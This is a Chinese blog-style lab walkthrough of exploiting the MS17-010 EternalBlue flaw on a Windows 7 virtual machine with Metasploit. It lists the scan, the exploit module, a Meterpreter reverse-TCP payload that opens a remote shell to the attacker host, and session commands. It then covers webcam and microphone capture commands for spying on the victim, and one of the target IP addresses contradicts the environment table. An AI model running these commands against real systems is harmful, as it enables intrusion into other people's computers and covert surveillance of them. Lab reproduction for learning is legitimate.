MS17_010 永恒之蓝复现
https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2017/ms17-010Metasploit介绍及命令:https://blog.csdn.net/qq_39583774/article/details/119144119主机探测查找模块ms17-010使用方法:先决条件:windos7有摄像头,并能够使用。
·
环境
| 主机 | IP |
|---|---|
| kali | 192.168.252.128 |
| windos7 | 192.168.252.139 |
漏洞介绍
https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2017/ms17-010
Metasploit渗透测试模块
Metasploit介绍及命令:https://blog.csdn.net/qq_39583774/article/details/119144119
启动方法:msfconsole
主机探测
nmap -sV 192.168.252.139
查找模块ms17-010
search ms17-010
使用方法:
use exploit/windows/smb/ms17_010_eternalblue #选择模块
set rhost 192.168.252.138 #设置攻击目标ip
set lhost 192.168.252.128 #设置kali ip
set payload windows/x64/meterpreter/reverse_tcp #攻击模块装载
run #开始攻击
这里已经渗透成功使用命令模块
Stdapi: Webcam Commands
Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream Play a video stream from the specified webcam
sessions -I #可以查看控制的计算机
sessions -I id #进入以控制的计算机
background #退回上一级
shell #建立shell
因为windos7 系统是中文会出现乱码
chcp 65001#可以解决
尝试使用获取windos 7 的摄像头
先决条件:windos7有摄像头,并能够使用。
这里使用虚拟机连接真实机摄像头
这里拍了一张照片,我拿手挡住了,建议大家还是把笔记本电脑的摄像头拿东西挡住。
webcam_snap
「智能机器人开发者大赛」官方平台,致力于为开发者和参赛选手提供赛事技术指导、行业标准解读及团队实战案例解析;聚焦智能机器人开发全栈技术闭环,助力开发者攻克技术瓶颈,促进软硬件集成、场景应用及商业化落地的深度研讨。 加入智能机器人开发者社区iRobot Developer,与全球极客并肩突破技术边界,定义机器人开发的未来范式!
更多推荐
3
0- 0
已为社区贡献1条内容
所有评论(0)